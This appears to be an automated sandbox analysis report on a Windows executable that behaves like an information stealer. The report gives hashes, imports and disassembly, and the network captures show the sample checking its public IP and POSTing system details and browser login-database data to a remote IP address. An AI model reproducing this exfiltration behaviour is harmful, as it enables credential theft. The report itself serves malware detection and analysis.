          SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
          SHA512:335108a63a07d9d81240c40e67dc6375468bd5bae79edf413b0ec8913e43364b155fdebe0c972ab6150ae2c59779d75045108d9a257e2ce0b8c5ae78f819804e
          SSDEEP:1536:KRF3gVPu3b3X41IiaqGyB0+Hls+X7nTfRQP7K:yRE23zX41la+THls+m+
          TLSH:A2834947376A00ECD1ABA378D5A30A06D772BC05076193DF13A0A17A0FA67D1AE7FB51
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a.......a...b...a...e...a...d...a...`...a...`...a...`.r.a...h...a.......a...c...a.Rich..a........................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x14000bae8
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x140000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x6729C700 [Tue Nov 5 07:19:28 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:066fb96ba163200488bf8cbd9705163e
          Instruction
          dec eax
          sub esp, 28h
          call 00007FE904B9D9C0h
          dec eax
          add esp, 28h
          jmp 00007FE904B9D167h
          int3
          int3
          retn 0000h
          int3
          inc eax
          push ebx
          dec eax
          sub esp, 20h
          dec eax
          mov ebx, ecx
          xor ecx, ecx
          call dword ptr [000025CFh]
          dec eax
          mov ecx, ebx
          call dword ptr [000025BEh]
          call dword ptr [000025C8h]
          dec eax
          mov ecx, eax
          mov edx, C0000409h
          dec eax
          add esp, 20h
          pop ebx
          dec eax
          jmp dword ptr [000025BCh]
          dec eax
          mov dword ptr [esp+08h], ecx
          dec eax
          sub esp, 38h
          mov ecx, 00000017h
          call dword ptr [000025B0h]
          test eax, eax
          je 00007FE904B9D2F9h
          mov ecx, 00000002h
          int 29h
          dec eax
          lea ecx, dword ptr [00009D26h]
          call 00007FE904B9D39Eh
          dec eax
          mov eax, dword ptr [esp+38h]
          dec eax
          mov dword ptr [00009E0Dh], eax
          dec eax
          lea eax, dword ptr [esp+38h]
          dec eax
          add eax, 08h
          dec eax
          mov dword ptr [00009D9Dh], eax
          dec eax
          mov eax, dword ptr [00009DF6h]
          dec eax
          mov dword ptr [00009C67h], eax
          dec eax
          mov eax, dword ptr [esp+40h]
          dec eax
          mov dword ptr [00009D6Bh], eax
          mov dword ptr [00009C41h], C0000409h
          mov dword ptr [00009C3Bh], 00000001h
          mov dword ptr [00009C45h], 00000001h
          Programming Language:
          • [IMP] VS2008 SP1 build 30729
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x11ed40x154.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x160000x9f0.pdata
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x10c.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0xf7b00x70.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6700x140.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0xe0000x630.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xc0770xc200bb167b742e9c1e46cecec9663ad94a6eFalse0.48012644974226804DIY-Thermocam raw data (Lepton 3.x), scale -14592-0, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 262144.000000, slope 171778.0468756.1463104557320865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0xe0000x62400x6400a9c91b7191e54302f31a2135cbaafa16False0.3462109375data4.930625889732141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x150000xda00x800f49b7b400b3a9a593e0463969e69304eFalse0.19775390625DOS executable (block device driver)3.6357853761384584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .pdata0x160000x9f00xa005859a68e779cdab4bed9be7147961d7cFalse0.493359375data4.82362794619983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x170000x1e00x2002c9bc3c453765c5a8e37ea178e81aa1bFalse0.52734375data4.710061382693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x180000x10c0x2009549c1cc6ee8d55da6140afe18223169False0.42578125data3.2295190100213778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_MANIFEST0x170600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
          DLLImport
          KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
          USER32.dllShowWindow
          ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
          MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
          IPHLPAPI.DLLGetAdaptersInfo
          NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
          WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
          VCRUNTIME140_1.dll__CxxFrameHandler4
          VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
          api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
          api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
          api-ms-win-crt-string-l1-1-0.dllisalnum
          api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
          api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
          api-ms-win-crt-math-l1-1-0.dll__setusermatherr
          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSource PortDest PortSource IPDest IP
          Dec 6, 2024 11:49:13.232769012 CET4970480192.168.2.5172.67.74.152
          Dec 6, 2024 11:49:13.352699041 CET8049704172.67.74.152192.168.2.5
          Dec 6, 2024 11:49:13.352781057 CET4970480192.168.2.5172.67.74.152
          Dec 6, 2024 11:49:13.353233099 CET4970480192.168.2.5172.67.74.152
          Dec 6, 2024 11:49:13.473386049 CET8049704172.67.74.152192.168.2.5
          Dec 6, 2024 11:49:14.451877117 CET8049704172.67.74.152192.168.2.5
          Dec 6, 2024 11:49:14.501600981 CET4970480192.168.2.5172.67.74.152
          Dec 6, 2024 11:49:14.684916973 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.804789066 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.805488110 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.805691004 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.805761099 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.926768064 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.926909924 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.926918983 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927000046 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927009106 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927021980 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.927031994 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927092075 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.927216053 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927258015 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927262068 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.927301884 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:14.927345037 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927371979 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:14.927419901 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.047005892 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047039032 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047091007 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047147036 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047156096 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047173023 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.047188044 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.047228098 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.047256947 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.090779066 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.091413021 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.210813999 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.211389065 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.254879951 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.254961967 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.374741077 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.374808073 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.462816000 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.462903023 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.582839966 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.582911968 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:15.834911108 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:15.835098028 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:16.086796045 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:16.086934090 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:16.334815979 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:16.335092068 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:16.582859039 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:16.582973003 CET4970580192.168.2.5185.237.165.97
          Dec 6, 2024 11:49:16.834821939 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:16.939390898 CET8049705185.237.165.97192.168.2.5
          Dec 6, 2024 11:49:44.528742075 CET4970480192.168.2.5172.67.74.152
          TimestampSource PortDest PortSource IPDest IP
          Dec 6, 2024 11:49:13.078744888 CET5453253192.168.2.51.1.1.1
          Dec 6, 2024 11:49:13.220551014 CET53545321.1.1.1192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 6, 2024 11:49:13.078744888 CET192.168.2.51.1.1.10x7e9bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 6, 2024 11:49:13.220551014 CET1.1.1.1192.168.2.50x7e9bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
          Dec 6, 2024 11:49:13.220551014 CET1.1.1.1192.168.2.50x7e9bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
          Dec 6, 2024 11:49:13.220551014 CET1.1.1.1192.168.2.50x7e9bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
          • api.ipify.org
          • 185.237.165.97
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549704172.67.74.152806172C:\Users\user\Desktop\Simple1.exe
          TimestampBytes transferredDirectionData
          Dec 6, 2024 11:49:13.353233099 CET88OUTGET / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: WinHTTP/1.0
          Host: api.ipify.org
          Dec 6, 2024 11:49:14.451877117 CET429INHTTP/1.1 200 OK
          Date: Fri, 06 Dec 2024 10:49:14 GMT
          Content-Type: text/plain
          Content-Length: 12
          Connection: keep-alive
          Vary: Origin
          CF-Cache-Status: DYNAMIC
          Server: cloudflare
          CF-RAY: 8edbb5484d5d4390-EWR
          server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
          Data Ascii: 8.46.123.228


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.549705185.237.165.97806172C:\Users\user\Desktop\Simple1.exe
          TimestampBytes transferredDirectionData
          Dec 6, 2024 11:49:14.805691004 CET185OUTPOST /userdata HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=WebKitFormBoundary
          User-Agent: WinHTTP/1.0
          Content-Length: 97034
          Host: 185.237.165.97
          Dec 6, 2024 11:49:14.805761099 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
          Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
          Dec 6, 2024 11:49:14.927021980 CET6180OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:14.927092075 CET7416OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:14.927262068 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:14.927301884 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:14.927419901 CET4944OUTData Raw: 43 52 45 41 54 45 20 54 41 42 4c 45 20 70 61 73 73 77 6f 72 64 5f 6e 6f 74 65 73 20 28 69 64 20 49 4e 54 45 47 45 52 20 50 52 49 4d 41 52 59 20 4b 45 59 20 41 55 54 4f 49 4e 43 52 45 4d 45 4e 54 2c 20 70 61 72 65 6e 74 5f 69 64 20 49 4e 54 45 47
          Data Ascii: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL,
          Dec 6, 2024 11:49:15.047188044 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:15.047228098 CET7416OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:15.047256947 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii:
          Dec 6, 2024 11:49:15.091413021 CET25956OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: &Qlogins_edge_extended_table_version3Cedge_breached_table_version3;last_compatible_versi


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:05:49:11
          Start date:06/12/2024
          Path:C:\Users\user\Desktop\Simple1.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\Simple1.exe"
          Imagebase:0x7ff71e390000
          File size:81'920 bytes
          MD5 hash:218954F9DD70247E51AF8A30940D5C33
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:05:49:11
          Start date:06/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:30.9%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:39.4%
            Total number of Nodes:652
            Total number of Limit Nodes:6
            execution_graph 3696 7ff71e3969e0 3697 7ff71e396a03 3696->3697 3698 7ff71e396a21 setvbuf 3697->3698 3700 7ff71e396a9f 3697->3700 3699 7ff71e396a2f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3698->3699 3698->3700 3699->3700 3701 7ff71e396a51 _get_stream_buffer_pointers 3699->3701 3702 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3700->3702 3701->3700 3703 7ff71e396ace 3702->3703 3862 7ff71e396ae0 3863 7ff71e396b16 3862->3863 3869 7ff71e396b35 3862->3869 3864 7ff71e3988f0 10 API calls 3863->3864 3866 7ff71e396b1b 3864->3866 3865 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3868 7ff71e396bab 3865->3868 3867 7ff71e396b1f fsetpos 3866->3867 3866->3869 3867->3869 3869->3865 3764 7ff71e39b85c 3765 7ff71e39b874 3764->3765 3766 7ff71e39b87e 3764->3766 3767 7ff71e39b500 _Receive_impl free 3765->3767 3767->3766 3768 7ff71e39c65e ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 3175 7ff71e399df0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3769 7ff71e398670 3774 7ff71e397530 3769->3774 3777 7ff71e39754d 3774->3777 3775 7ff71e3975f5 